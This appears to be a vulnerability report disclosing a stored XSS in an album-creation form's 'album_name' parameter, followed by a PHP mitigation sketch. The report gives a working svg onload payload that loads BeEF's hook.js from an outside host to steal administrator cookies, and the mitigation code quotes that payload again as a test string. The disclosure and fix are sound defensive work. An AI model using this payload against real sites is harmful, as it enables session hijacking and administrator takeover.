Open
Description
Alert users who are still using the project
- Conditions: Common user
The POST parameter "album_name" in the path "/index.php/album/add" has a stored XSS. This can result in arbitrary JS code execution, obtaining administrator cookies to obtain administrator permissions, etc.
The album name can inject XSS: `<svg/onload=$.getScript("http://gp.io:81");>`, which introduces the hook.js of BeEF.
XSS is triggered when the administrator goes online.
BeEF goes online and gets the cookie.
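A mitigation sketch for the issue reported above, added here as an example and not taken from the project's code: reject markup in the album name on input, HTML-encode it wherever it is rendered, and keep the session cookie out of reach of script. The function names, the allowed-character policy and the surrounding markup are assumptions, since the report does not show the project's source.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: validate "album_name" when /index.php/album/add receives it.
// Assumed policy: letters, digits, space, underscore, dot, hyphen; 1 to 64 characters.
function validate_album_name(string $raw): ?string
{
    $name = trim($raw);
    if (preg_match('/^[\p{L}\p{N} _.\-]{1,64}$/u', $name) !== 1) {
        return null; // reject outright instead of trying to strip markup
    }
    return $name;
}

// Hypothetical helper: encode on output. This is the control that matters for
// rows already stored in the database before input validation was added.
function render_album_title(string $storedName): string
{
    $safe = htmlspecialchars($storedName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2 class="album-title">' . $safe . '</h2>'; // markup is an assumption
}

// Call before session_start(). HttpOnly keeps document.cookie from exposing the
// session id to injected script; 'secure' assumes the site is served over HTTPS.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed check using the album name quoted in the report.
$reported = '<svg/onload=$.getScript("http://gp.io:81");>';

// Input side: the name is rejected, a plain name is accepted.
var_dump(validate_album_name($reported));
var_dump(validate_album_name('Summer 2023'));

// Output side: a previously stored copy is rendered as inert text,
// with < > and " emitted as HTML entities.
echo render_album_title($reported), PHP_EOL;
```

Output encoding has to be applied on every page that displays the album name, including the administrator views where the report says the script fired.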


